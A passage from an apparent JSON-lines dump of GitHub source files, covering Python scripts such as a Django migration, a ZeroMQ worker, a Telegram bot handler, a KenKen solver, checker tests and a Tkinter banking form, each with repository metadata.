plotting_image(image):\n px = 1/plt.rcParams['figure.dpi'] \n \n fig = plt.figure() \n ax = fig.add_subplot(111)\n ax.set_axis_off()\n imgplot = plt.imshow(image, interpolation='none') \t\n plt.savefig('./The_model.png', transparent=False, dpi=200, bbox_inches='tight', pad_inches=0)\n #plt.show()\n\nfilename1 = 'mes.jpeg'\n#filename1 = 'my.png'\nfilename2 = \"message.bmp\"\nimg1 = mpimg.imread(filename1)\nimg2 = mpimg.imread(filename2)\n\nimgg = np.zeros_like(img1)\n\nfor i in range(3):\n imgg[:,:,i] = (img1[:,:,i] + img2[:,:,i])\n'''\n\nimg2 = img2/50\n\nimgg[:,:,0] = (img1[:,:,1] * img2[:,:,2])\nimgg[:,:,1] = (img1[:,:,2] * img2[:,:,0])\nimgg[:,:,2] = (img1[:,:,0] * img2[:,:,1])\n\n'''\nimg = Image.fromarray(imgg)\nimg.save('hidden.png')\n\nimgplot = plt.imshow(imgg)\nplt.show()\n'''\nplotting_image(imgg)\n'''","repo_name":"IlyaMbot/HideAndSeek","sub_path":"hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2971837246","text":"\nclass Segment:\n\n def __init__(self, s, e):\n\n self.start = s\n self.end = e\n\ndef get_optimal_points(segments):\n\n segments.sort(key=lambda segment: segment.end)\n\n current = segments[0].end\n\n points = [current]\n\n for i in range(1, len(segments)):\n\n if current < segments[i].start or current > segments[i].end:\n\n current = segments[i].end\n\n points.append(current)\n\n return points\n\ndef main():\n\n segments = [\n Segment(4, 7),\n Segment(1, 3),\n Segment(2, 5),\n Segment(5, 6)\n ]\n\n for point in get_optimal_points(segments):\n\n print(point)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sshh12/SchoolCode","sub_path":"Algorithms/Greedy/CoveringSegments.py","file_name":"CoveringSegments.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"12604614273","text":"from django.apps 
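# --- Editor's addition: a worked trace for get_optimal_points above. ---
# Sorting the sample segments by right endpoint gives (1,3) (2,5) (5,6) (4,7).
# The greedy rule keeps a new point only when the next segment misses the
# current one:
#   current = 3  -> covers (1,3) and (2,5)
#   (5,6) starts after 3 -> current = 6, which also covers (4,7)
# so the two printed points are 3 and 6.
assert get_optimal_points([Segment(4, 7), Segment(1, 3),
                           Segment(2, 5), Segment(5, 6)]) == [3, 6]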
import apps\nfrom django.db import migrations, models\nfrom django.db.models import F\n\n\ndef copy_field(apps, schema_editor):\n CertificateGenerationCourseSetting = apps.get_model('certificates', 'CertificateGenerationCourseSetting')\n CertificateGenerationCourseSetting.objects.all().update(self_generation_enabled=F('enabled'))\n\ndef undo_copy(apps, schema_editor):\n CertificateGenerationCourseSetting = apps.get_model('certificates', 'CertificateGenerationCourseSetting')\n CertificateGenerationCourseSetting.objects.all().update(enabled=F('self_generation_enabled'))\n\nclass Migration(migrations.Migration):\n \"\"\"\n Adds new field 'language_specific_templates_enabled'.\n Also adds field 'self_generation_enabled' which is a \n replacement for 'enabled'\n Lastly, copies data from 'enabled' to 'self_generation_enabled'\n \"\"\"\n dependencies = [\n ('certificates', '0008_schema__remove_badges'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='certificategenerationcoursesetting',\n name='language_specific_templates_enabled',\n field=models.BooleanField(default=False, help_text=\"Render translated certificates rather than using the platform's default language. Available translations are controlled by the certificate template.\"),\n ),\n migrations.AddField(\n model_name='certificategenerationcoursesetting',\n name='self_generation_enabled',\n field=models.BooleanField(default=False, help_text='Allow students to generate their own certificates for the course. Enabling this does NOT affect usage of the management command used for batch certificate generation.'),\n ),\n migrations.AlterField(\n model_name='certificategenerationcoursesetting',\n name='enabled',\n field=models.BooleanField(default=False, help_text='DEPRECATED, please use self_generation_enabled instead.'),\n ),\n migrations.RunPython(copy_field, reverse_code=undo_copy),\n ]\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/certificates/migrations/0009_certificategenerationcoursesetting_language_self_generation.py","file_name":"0009_certificategenerationcoursesetting_language_self_generation.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"23822151149","text":"# -*- coding: utf-8 -*-\n# @file : pull.py\n# @author : shlian\n# @date : 2019/6/6\n# @version: 1.0\n# @desc :\nimport zmq\nimport zmq.asyncio\nimport asyncio\nimport signal\n\nrun_flag=True\n\nasync def start():\n context=zmq.asyncio.Context(io_threads=5)\n pull_socket=context.socket(socket_type=zmq.PULL)\n pull_socket.connect(\"tcp://127.0.0.1:46789\")\n\n poller=zmq.asyncio.Poller()\n poller.register(socket=pull_socket)\n\n while(run_flag):\n for event in await poller.poll():\n if event[1] & zmq.POLLIN:\n data=await event[0].recv_json()\n print(\"recv:{0}\".format(data))\n\n #data=await pull_socket.recv_json()\n #print(\"recv:{0}\".format(data))\n\n\ndef sig_handler(signum,frame):\n global run_flag\n run_flag=False\n print(signum,frame)\n\nif __name__==\"__main__\":\n signal.signal(signal.SIGINT,sig_handler)\n signal.signal(signal.SIGTERM,sig_handler)\n asyncio.get_event_loop().run_until_complete(future=start())\n\n\n\n\n\n\n","repo_name":"ztenv/python","sub_path":"zeromq/push-pull/pull.py","file_name":"pull.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14324288390","text":"res = \"\"\nmax = -99999\nmin = 99999\nfor i in range(1, 
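# --- Editor's addition: a hedged companion sketch for the asyncio PULL worker above. ---
# This is a plain (synchronous) PUSH producer that feeds the worker; it binds the
# same endpoint the worker connects to, and the payload shape is illustrative.
import zmq

context = zmq.Context()
push_socket = context.socket(zmq.PUSH)
push_socket.bind("tcp://127.0.0.1:46789")
for n in range(10):
    push_socket.send_json({"task": n})  # matches the worker's recv_json()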
8):\n t = float(input())\n if t < 10:\n res = res + str(i) + \" \"\n if t < min:\n min = t\n if t > max:\n max = t\nprint(res)\nprint(min)\nprint(max)\n\n","repo_name":"duongnn194034/python-basic-2","sub_path":"Mid-Term/Test07.py","file_name":"Test07.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27687196791","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (CartItemViewSet, CartViewSet, CatalogViewSet,\n OrderItemViewSet, OrderViewSet, ProductViewSet,\n ReviewViewSet, CommentViewSet, ShippingAddressViewSet,\n sending_confirm_order)\n\nrouter = DefaultRouter()\nrouter.register('catalog', CatalogViewSet, basename='catalog')\nrouter.register('products', ProductViewSet, basename='products')\nrouter.register('cart', CartViewSet, basename='cart')\nrouter.register('cart-products', CartItemViewSet, basename='cart-products')\n\nrouter.register('order', OrderViewSet, basename='order')\nrouter.register('order-items', OrderItemViewSet, basename='order-items')\nrouter.register('shipping-address', ShippingAddressViewSet,\n basename='shipping-address')\n\nrouter.register('reviews', ReviewViewSet, basename='reviews')\nrouter.register('comments', CommentViewSet, basename='comments')\n\nurlpatterns = [\n path('v1/', include(router.urls)),\n path('v1/auth/', include('djoser.urls')),\n path('v1/auth/', include('djoser.urls.jwt')),\n path(\"v1/sending-confirm-order/\", sending_confirm_order,\n name=\"sending_confirm_order\"),\n]\n","repo_name":"EvgeniyBudaev/eccomerce_fullstack_mirrorlook_v3","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30239950300","text":"from aiogram import Bot, F, types\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State\nfrom aiogram.types import ReplyKeyboardRemove\n\nfrom ...utils.common_keyboards import confirmation_keyboard\nfrom .. 
import messages\nfrom ..bot import dp\nfrom ..models import Blocked\n\nconfirmation_state = State(\"confirm_block\")\n\n\n@dp.callback_query(lambda callback_query: str(callback_query.data).startswith(\"block_\"))\nasync def block_request(\n callback_query: types.CallbackQuery,\n state: FSMContext,\n bot: Bot,\n m: messages.en.Messages,\n):\n user_tg_id = callback_query.message.chat.id\n dst_tg_id = callback_query.data.split(\"_\")[1]\n await callback_query.answer()\n await state.set_state(confirmation_state)\n await state.set_data({\"blocking\": dst_tg_id})\n await bot.send_message(\n user_tg_id,\n m.block_confirmation,\n reply_markup=confirmation_keyboard(yes=m.yes_block, no=m.no_cancel),\n )\n\n\n@dp.message(confirmation_state, F.text.in_(messages.union.yes_block))\nasync def block_confirmed(\n message: types.Message, state: FSMContext, m: messages.en.Messages\n):\n user_tg_id = message.chat.id\n dst_tg_id = (await state.get_data())[\"blocking\"]\n _, __ = await Blocked.objects.aget_or_create(blocker=user_tg_id, blocked=dst_tg_id)\n await state.clear()\n await message.reply(m.user_blocked, reply_markup=ReplyKeyboardRemove())\n\n\n@dp.message(confirmation_state, F.text.in_(messages.union.no_cancel))\nasync def block_cancelled(\n message: types.Message, state: FSMContext, m: messages.en.Messages\n):\n await state.clear()\n await message.reply(m.block_cancelled, reply_markup=ReplyKeyboardRemove())\n\n\n@dp.message(confirmation_state)\nasync def unknown(message: types.Message, m: messages.en.Messages):\n await message.reply(m.confirmation_keyboard_ignored)\n","repo_name":"Ali-Toosi/eastern-bots","sub_path":"eastern_bots/opanonbot/handlers/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8217840281","text":"#!/usr/bin/python3\n\n#a function that prints numbers 1 to 100\n\nfor i in range(1,101):\n\n if (i % 3 != 0):\n\n print(f'{i}, ',end='')\n\n else:\n\n print(f'Ngure, ',end='')\n\n","repo_name":"nguredavid/learnpython","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5261683681","text":"\"\"\"\nMisago UI views controller\n\nUI views are small views that are called asynchronically to give UI knowledge\nof changes in APP state and thus opportunity to update themselves in real time\n\"\"\"\nfrom time import time\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import resolve\nfrom django.http import Http404, JsonResponse\n\nfrom misago.users.online.tracker import mute_tracker\n\nfrom misago.core.decorators import ajax_only\nfrom misago.core.utils import is_referer_local\n\n\n__all__ = ['uiview', 'uiserver']\n\n\nUI_VIEWS = []\n\n\ndef uiview(name, cache_frequency=15):\n \"\"\"\n Decorator for registering UI views\n \"\"\"\n def namespace_decorator(f):\n UI_VIEWS.append((name, cache_frequency, f))\n return f\n return namespace_decorator\n\n\ndef get_resolver_match(request):\n requesting_path = request.META['HTTP_REFERER']\n requesting_path = requesting_path[len(request.scheme) + 3:]\n requesting_path = requesting_path[len(request.META['HTTP_HOST']):]\n\n try:\n return resolve(requesting_path)\n except Http404:\n return None\n\n\n@ajax_only\ndef uiserver(request):\n mute_tracker(request)\n\n if not is_referer_local(request):\n raise 
PermissionDenied()\n\n    resolver_match = get_resolver_match(request)\n    response_dict = {}\n\n    now = int(time())\n\n    for name, cache_frequency, view in UI_VIEWS:\n        cache_key = 'uijson_%s' % name\n        cache = request.session.get(cache_key)\n\n        if not cache or cache['expires'] < now:\n            try:\n                view_response = view(request, resolver_match)\n            except PermissionDenied:\n                view_response = None\n\n            request.session[cache_key] = {\n                'json': view_response,\n                'expires': now + cache_frequency\n            }\n\n            if view_response:\n                response_dict[name] = view_response\n        elif cache['json']:\n            response_dict[name] = cache['json']\n\n    return JsonResponse(response_dict)\n","repo_name":"xuzhao1211/OnlineExam","sub_path":"misago/core/uiviews.py","file_name":"uiviews.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26413000439","text":"#!/usr/bin/env python3\n\nimport sys\n\ni = 0\nb = 0\n#t = 0\n#Input#\nif len(sys.argv) > 1:\n    #open from file#\n    f = open( sys.argv[1] )\nelse:\n    #read from stdin by using <#\n    f = sys.stdin\n    \nfor count, line in enumerate( f ):\n    #Alignments#\n    if line.startswith(\"SRR072893\"):\n        fields = line.rstrip(\"\\r\\n\").split(\"\\t\")\n        b = 0\n        for l in fields[5]:\n            if l in (\"I\", \"D\", \"N\", \"S\", \"H\", \"P\", \"=\", \"X\"):\n                b = 1\n        for l in fields[5]:\n            if l in (\"M\") and b == 0:\n                i = i+1\n\nprint(\"There are \" + str(i) + \" alignments that match perfectly to the genome.\")","repo_name":"djlmt/qbb2018-answers","sub_path":"day2-lunch/day2-exercise-2.py","file_name":"day2-exercise-2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25151226350","text":"import sys\nfrom collections import deque\nimport copy\nimport itertools\n\n'''\nInput:\n    n - where grid is nxn\n    m - number of constraints\n    1 constraint per line\n    ex. 
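# --- Editor's addition: a hedged refinement of the alignment counter above. ---
# An all-M CIGAR such as 36M still allows mismatches, since SAM's M operation
# covers both matches and mismatches. A stricter "perfect match" test would also
# require the optional NM (edit distance) tag to be zero, when the aligner emits
# it; `fields` here is the tab-split SAM line from the script above.
def is_perfect(fields):
    cigar_all_m = all(c in "0123456789M" for c in fields[5])  # only match-length runs
    nm_zero = any(tag == "NM:i:0" for tag in fields[11:])     # optional tags start at column 12
    return cigar_all_m and nm_zero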
+ 2 0,1 0,2\n * 9 2,2 3,2 2,3\n v 4 5,2\n'''\n\ndef read_input():\n constraints = []\n size = int(sys.stdin.readline().strip())\n num_constraints = int(sys.stdin.readline().strip())\n for i in range(num_constraints):\n constraint = sys.stdin.readline().strip()\n constraint = constraint.split(' ')\n constraint[1] = int(constraint[1])\n for j in range(2, len(constraint)):\n constraint[j] = (int(constraint[j][0]), int(constraint[j][2]))\n constraints.append(constraint)\n return size, num_constraints, constraints\n\nclass KenKenSolver:\n def __init__(self, size):\n self.size = size\n self.assignment = [[0 for i in range(size)] for i in range(size)]\n self.domains = {}\n self.arcs = {}\n self.constraints = {}\n\n def display(self):\n for i in range(self.size):\n print(self.assignment[i])\n \n '''\n Adds possible values from 1 to n to domain for each position in puzzle\n '''\n def createDomains(self):\n for i in range(self.size):\n for j in range(self.size):\n self.domains[(i,j)] = []\n for k in range(self.size):\n self.domains[(i,j)].append(k + 1)\n \n \"\"\"\n Creates arc between positions on same column or row\n \"\"\"\n def createArcs(self):\n for i in range(self.size):\n for j in range(self.size):\n self.arcs[(i,j)] = []\n for arc in self.arcs:\n for i in range(self.size):\n if i != arc[1]:\n self.arcs[arc].append((arc[0], i))\n for i in range(self.size):\n if i != arc[0]:\n self.arcs[arc].append((i, arc[1]))\n \n \"\"\"\n Adds constraint for each position based on arithmetic box it is a member of\n \"\"\"\n def addConstraints(self, constraints):\n for i in range(len(constraints)):\n if constraints[i][0] != 'v':\n for j in range(2, len(constraints[i])):\n self.constraints[constraints[i][j]] = []\n for k in range(len(constraints[i])):\n if constraints[i][k] != constraints[i][j]:\n self.constraints[constraints[i][j]].append(constraints[i][k])\n \n \"\"\"\n Assigns any values that are given in initial puzzle state\n \"\"\"\n def createAssignment(self, constraints):\n for i in range(len(constraints)):\n if constraints[i][0] == 'v':\n pos = constraints[i][2]\n self.assignment[pos[0]][pos[1]] = constraints[i][1]\n\n \"\"\"\n AC3 algorithm - removes illegal values from each square's domain\n \"\"\"\n def AC3(self):\n revised = False\n q = deque()\n for arc in self.arcs:\n for var in self.arcs[arc]:\n q.append((arc, var))\n while q:\n (Xi, Xj) = q.popleft()\n if self.revise(Xi, Xj):\n assert len(self.domains[Xi]) > 0\n for Xk in self.arcs[Xi]:\n if Xk != Xj:\n q.append((Xk, Xi)) \n revised = True\n return revised\n \n def revise(self, Xi, Xj):\n revised = False\n for x in self.domains[Xi]:\n needToRevise = True\n for y in self.domains[Xj]:\n if y != x:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n return revised\n\n \"\"\"\n Uses AC3 algorithm to remove illegal values from each square's domain based\n on arithmetic box\n \"\"\"\n def AC3Constraints(self):\n revised = False\n q = deque()\n for var in self.constraints:\n q.append((var, list(self.constraints[var][2:])))\n while q:\n (Xi, Xj) = q.popleft()\n if self.reviseConstraints(Xi, Xj):\n assert len(self.domains[Xi]) > 0\n for Xk in Xj:\n q.append((Xk, list(self.constraints[Xk][2:])))\n revised = True\n return revised\n\n def reviseConstraints(self, Xi, Xj):\n revised = False\n operation = self.constraints[Xi][0]\n target = self.constraints[Xi][1]\n if len(Xj) == 1:\n for x in self.domains[Xi]:\n needToRevise = True\n for Xk in Xj:\n for y in self.domains[Xk]:\n if operation == '+':\n if x + y == 
target:\n needToRevise = False\n if operation == '*':\n if x * y == target:\n needToRevise = False\n if operation == '-':\n if x - y == target or y - x == target:\n needToRevise = False\n if operation == '/':\n if x / y == target or y / x == target:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n else:\n domains = []\n for Xk in Xj:\n domains.append(self.domains[Xk])\n fullDomain = list(itertools.product(*domains))\n possibleValues = []\n for x in self.domains[Xi]:\n needToRevise = True\n if operation == '+':\n for i in range(len(fullDomain)):\n possibleValues.append(self.addValue(fullDomain[i]))\n for y in possibleValues:\n if x + y == target:\n needToRevise = False\n elif operation == '*':\n for i in range(len(fullDomain)):\n possibleValues.append(self.multiplyValue(fullDomain[i]))\n for y in possibleValues:\n if x * y == target:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n return revised\n\n \"\"\"\n Runs both AC3 algorithms until no further changes are made\n \"\"\"\n def AC3Prep(self):\n reg_revised = True\n constraint_revised = True\n while not self.isAssignmentComplete() and (reg_revised or constraint_revised) :\n for var in self.domains:\n if len(self.domains[var]) == 1:\n self.assignment[var[0]][var[1]] = self.domains[var][0]\n if len(self.domains[var]) == 0:\n return \"Unsolvable\"\n reg_revised = self.AC3()\n constraint_revised = self.AC3Constraints()\n\n\n def backtrackSearch(self):\n if self.backtrack() != \"failure\":\n self.display()\n else:\n print(\"Could not solve\")\n\n \"\"\"\n Backtrack search - attempts to complete assignment,\n backtracks if dead end reached\n \"\"\"\n def backtrack(self):\n if self.isAssignmentComplete():\n return self.assignment\n var = self.selectUnassignedVariable()\n for value in self.orderDomainValues(var):\n if self.isAssignmentConsistent(var, value):\n self.assignment[var[0]][var[1]] = value\n result = self.backtrack()\n if result != \"failure\":\n return result\n self.assignment[var[0]][var[1]] = 0\n return \"failure\"\n\n def isAssignmentComplete(self):\n for i in range(self.size):\n for j in range(self.size):\n if self.assignment[i][j] == 0:\n return False\n return True\n\n def isAssignmentConsistent(self, Xi, x):\n assignment = copy.deepcopy(self.assignment)\n assignment[Xi[0]][Xi[1]] = x\n isConsistent = True\n if not self.isNodeConsistent(assignment, Xi):\n isConsistent = False\n for Xj in self.arcs[Xi]:\n if not self.isArcConsistent(assignment, Xi, Xj):\n isConsistent = False\n if not self.isNodeConstraintConsistent(assignment, Xi):\n isConsistent = False\n return isConsistent \n\n \"\"\"\n Checks if square's assignment is consistent with arithmetic box\n - if neighbor(s) are already assigned, \n value must be consistent with target value\n - if neighbor(s) have not been assigned,\n value must allow for possible achievement of target value\n \"\"\"\n def isNodeConstraintConsistent(self, assignment, Xi):\n isConsistent = False\n operation = self.constraints[Xi][0]\n target = self.constraints[Xi][1]\n Xj = list(self.constraints[Xi][2:])\n if len(Xj) == 1:\n if assignment[Xj[0][0]][Xj[0][1]] == 0:\n for y in self.domains[Xj[0]]:\n if operation == '+':\n if assignment[Xi[0]][Xi[1]] + y == target:\n isConsistent = True\n elif operation == '*':\n if assignment[Xi[0]][Xi[1]] * y == target:\n isConsistent = True\n elif operation == '-':\n if (assignment[Xi[0]][Xi[1]] - y == target or\n y - assignment[Xi[0]][Xi[1]] == target):\n isConsistent = True\n elif 
operation == '/':\n                    if (assignment[Xi[0]][Xi[1]] / assignment[Xj[0][0]][Xj[0][1]] == target or\n                        assignment[Xj[0][0]][Xj[0][1]] / assignment[Xi[0]][Xi[1]] == target):\n                        isConsistent = True          \n        else:\n            domains = []\n            for Xk in Xj:\n                if assignment[Xk[0]][Xk[1]] == 0:\n                    domains.append(self.domains[Xk])\n                else:\n                    domains.append([assignment[Xk[0]][Xk[1]]])\n            fullDomain = list(itertools.product(*domains))\n            possibleValues = []\n            if operation == '+':\n                for i in range(len(fullDomain)):\n                    possibleValues.append(self.addValue(fullDomain[i]))\n                for y in possibleValues:\n                    if assignment[Xi[0]][Xi[1]] + y == target:\n                        isConsistent = True\n            elif operation == '*':\n                for i in range(len(fullDomain)):\n                    possibleValues.append(self.multiplyValue(fullDomain[i]))\n                for y in possibleValues:\n                    if assignment[Xi[0]][Xi[1]] * y == target:\n                        isConsistent = True\n        return isConsistent\n\n    def multiplyValue(self, value):\n        val = 1\n        for x in value:\n            val = val * x\n        return val\n\n    def addValue(self, value):\n        val = 0\n        for x in value:\n            val += x\n        return val\n\n    def isNodeConsistent(self, assignment, Xi):\n        if (assignment[Xi[0]][Xi[1]] >= 0 and \n            assignment[Xi[0]][Xi[1]] <= self.size):\n            return True\n        else:\n            return False\n\n    def isArcConsistent(self, assignment, Xi, Xj):\n        if assignment[Xi[0]][Xi[1]] != self.assignment[Xj[0]][Xj[1]]:\n            return True\n        else:\n            return False\n    \n    \"\"\"\n    Select unassigned square with lowest number of values in domain\n    \"\"\"\n    def selectUnassignedVariable(self):\n        min_values = self.size + 1  # larger than any domain, so the MRV pick works for every grid size\n        position = None\n        for i in range(self.size):\n            for j in range(self.size):\n                if self.assignment[i][j] == 0 and len(self.domains[i,j]) < min_values:\n                    position = (i,j)\n                    min_values = len(self.domains[i,j])\n        return position\n\n    def orderDomainValues(self, var):\n        return self.domains[var]\n\nif __name__ == \"__main__\":\n    size, numConstraints, constraints = read_input()\n    solver = KenKenSolver(size)\n    solver.createDomains()\n    solver.createArcs()\n    solver.addConstraints(constraints)\n    solver.createAssignment(constraints)\n    print(\"\\n\")\n    solver.AC3Prep()\n    solver.backtrackSearch()\n","repo_name":"mmcnally1/kenken","sub_path":"kenken.py","file_name":"kenken.py","file_ext":"py","file_size_in_byte":13282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078170847","text":"import os\n\nfrom base import ContextTest, CommandContext, listall\nfrom checker.checkers.path import check\nfrom testfixtures import compare\n\nclass TestPath(ContextTest):\n\n    context = CommandContext\n\n    def test_source_doesnt_exist(self):\n        bad_path = os.path.join(self.c.config_folder,'bad')\n        compare(\n            check(self.c.config_folder,bad_path),\n            \"Does not exist:%r\"%bad_path\n        )\n\n    def test_source_is_made_absolute_at_start(self):\n        # CommandContext pretends nothing exists\n        compare(\n            check(self.c.config_folder,'foo'),\n            \"Does not exist:%r\"%os.path.abspath('foo')\n        )\n\n    def test_make_target_dir(self):\n        # make us 
not-windows\n self.c.r.replace('subprocess.mswindows',False)\n # pretend only our path exists\n path = '/some/deep/path'\n self.c.existing_paths.add(path)\n compare(check(self.c.config_folder,path),'')\n compare(listall(self.c.dir),[\n 'some',\n 'some/deep',\n 'some/deep/path.listing',\n ])\n compare(self.c.called,[\n \"cp -R '/some/deep/path' '<config>/some/deep'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/deep/path'\",\n ])\n\n def test_storage_path_already_exists(self):\n # This is the key element of this test:\n self.c.dir.makedir('something')\n \n self.c.r.replace('subprocess.mswindows',False)\n # pretend only our path exists\n path = '/something'\n self.c.existing_paths.add(path)\n\n compare(check(self.c.config_folder, path), '')\n compare(listall(self.c.dir),[\n 'something.listing',\n 'something',\n ])\n compare(self.c.called,[\n \"cp -R '/something' '<config>'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/something'\",\n ])\n\n def test_selinux_entries(self):\n # selinux in the 2.6 kernel introduces a new column\n # in the permissions block, which we ignore for now\n checker_txt = \"path:/some/folder\\n\"\n \n with CommandContext() as c:\n # pretend we're not on windows\n c.r.replace('subprocess.mswindows',False)\n # pretend the paths exist\n c.existing_paths.add('/some/folder')\n # stub out the cp and ls calls\n c.add(\"cp -R '/some/folder' '<config>/some'\",files=(\n ('some/folder/afile.cfg','content'),\n ('some/folder/bfile.cfg','content'),\n ('some/folder/cfile.cfg','content'),\n ))\n c.add(\"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/folder'\",\n output=\"\"\"/some/folder:\ntotal 36\ndrwxr-xr-x. 2 root root 4096 .\ndrwxr-xr-x+ 46 root root 4096 ..\n-rw-r--r--. 1 root root 2425 afile.cfg\n-rw-r--r--+ 1 root root 1421 bfile.cfg\n-rw-r--r-- 1 root root 1421 cfile.cfg\n\"\"\")\n # now run the config\n c.run_with_config(checker_txt)\n # check the calls\n compare(c.called,[\n \"cp -R '/some/folder' '<config>/some'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/folder'\",\n 'svn up -q <config>',\n 'svn status <config>'\n ])\n # check the files are as expected\n compare([\n 'checker.txt',\n 'some/folder.listing',\n 'some/folder/afile.cfg',\n 'some/folder/bfile.cfg',\n 'some/folder/cfile.cfg',\n ], listall(c.dir,dir=False))\n compare(\"\"\"/some/folder:\ndrwxr-xr-x root root .\n-rw-r--r-- root root afile.cfg\n-rw-r--r-- root root bfile.cfg\n-rw-r--r-- root root cfile.cfg\n\"\"\", c.dir.read(('some', 'folder.listing')))\n","repo_name":"simplistix/checker","sub_path":"checker/tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23318817097","text":"from tkinter import *\nfrom tkinter import font,messagebox\nfrom proyecto.imagenes.rutas_imagenes import Tool\nfrom proyecto.presentacion.confirmacion_transaccion import FrmConfirmarTransaccion\nfrom proyecto.negocios.Cliente import Cliente\nfrom proyecto.negocios.Cuenta import Cuenta\n\nclass FrmTransaccion(Frame):\n def __init__(self,master=None,titulo=None,accion=None,cliente=None):\n #def crear_ventana(self,master=None,titulo=None,accion=None,datos=None):\n super().__init__(master)\n self.titulo=titulo\n self.master = master\n self.accion=accion\n #self.datos=datos\n self.cliente=cliente\n self.cta_id=0\n #self.resultado=False\n #self.email_registrado=email\n self.numero_cta=StringVar()\n self.saldo_disp = StringVar()\n self.tipo_transaccion=StringVar()\n 
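# Tk variables holding the client's registration data (shown in the disabled identification entries)\n        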
self.correo_electronico = StringVar()\n        self.celular = StringVar()\n        self.cedula = StringVar()\n        self.lbl_fonts = font.Font(family=\"Calibri\", size=9, weight=\"bold\")\n        self.lbl_entrys = font.Font(family=\"Calibri\", size=14, weight=\"bold\")\n        self.tools = Tool(self.master)\n\n        self.master.title(titulo)\n        self.master.iconbitmap(self.tools.imagen_icono)\n        self.crear_widgets()\n\n\n    def continuar(self):\n        if self.accion==\"DEPOSITAR\":\n            self.depositar()\n\n        if self.accion==\"RETIRAR\":\n            messagebox.showinfo(self.titulo,\"En desarrollo.....\")\n\n        if self.accion == \"TRANSFERIR\":\n            messagebox.showinfo(self.titulo,\"En desarrollo.....\")\n\n\n    def depositar(self):\n        numero_cta = self.numero_cta.get()\n        saldo_disp = self.saldo_disp.get()\n        monto = self.txt_monto_transaccion.get()\n\n        if not monto:\n            messagebox.showwarning(self.titulo, \"Digite el monto a depositar, por favor!!\")\n            return False\n\n        monto=float(monto)\n        saldo = float(saldo_disp) + float(monto)\n\n        #verificar la transaccion a traves de la clave temp. enviada al correo registrado\n        ventana=Toplevel(self.master)\n        app=FrmConfirmarTransaccion()\n        resultado=app.crear_ventana(master=ventana,titulo=\"Confirmar Datos\",accion=\"REGISTRAR\",email=self.txt_email.get())\n\n        if not resultado:\n            messagebox.showwarning(self.titulo,\"No se puede seguir con la transacción!!\")\n            return False\n\n\n        cuentas = Cuenta()\n        if not cuentas.depositar_by_cta(self.cta_id,numero_cta, monto,saldo):\n            messagebox.showwarning(self.titulo, \"Ocurrió un error al momento de realizar la transacción!!\")\n            return False\n\n        messagebox.showinfo(self.titulo, \"Depósito realizado con éxito!!\")\n        if messagebox.askquestion(self.titulo,\"Desea realizar otra transacción: \")==\"no\":\n            self.master.destroy()\n\n\n    def cancelar(self):\n        if messagebox.askquestion(title=self.titulo, message=\"Está seguro de cancelar la transacción Sí / No\") == \"yes\":\n            self.master.destroy()\n\n\n    def validate_entry(self,text):\n        # print(text,\"largo codigo: \",len(self.txt_codigo_temp.get()))\n        # if len(self.txt_codigo_temp.get())>3:\n        #     messagebox.showinfo(\"parar\")\n        #     text = \"\"\n        #     return text\n        return text.isdecimal()\n\n    def crear_widgets(self):\n        fila_grid = 1\n\n        # ZONA DE IDENTIFICACION\n        self.lbl_frm_ident = LabelFrame(self.master, text=\"Identificación\",\n                                        font=self.lbl_fonts,\n                                        width=60, height=100)\n        self.lbl_frm_ident.grid(row=fila_grid, column=0, padx=20, pady=5)\n        fila_grid += 1\n\n        self.lbl1 = Label(self.lbl_frm_ident, text=\"Correo Electrónico\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n        self.lbl1.grid(row=fila_grid, column=1, padx=10, pady=2)\n        self.txt_email = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.correo_electronico)\n        self.txt_email.grid(row=fila_grid, column=2, padx=15, pady=2)\n        fila_grid += 1\n\n        self.lbl2 